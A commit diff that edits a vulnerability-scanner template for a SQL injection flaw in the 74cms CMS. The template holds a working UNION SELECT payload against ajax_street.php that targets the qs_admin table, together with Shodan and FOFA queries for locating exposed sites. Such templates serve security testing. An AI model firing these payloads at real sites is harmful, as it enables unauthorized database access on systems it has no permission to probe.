Update CVE-2020-22208.yaml

patch-1
Ritik Chaddha 2022-06-28 14:43:20 +05:30 committed by GitHub
parent 8234a29c97
commit 6bb869ac29
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 3 deletions

View File

@ -15,15 +15,14 @@ info:
cve-id: CVE-2020-22210
cwe-id: CWE-89
metadata:
verified: true
fofa-query: app="74cms"
shodan-query: http.html:"Powered by 74cms"
shodan-query: http.html:"74cms"
tags: cve,cve2020,74cms,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11<31>'%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{randstr}}),9%20from%20qs_admin#"
- '{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11<31>%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5("{{randstr}}"),9%20from%20qs_admin#'
matchers:
- type: word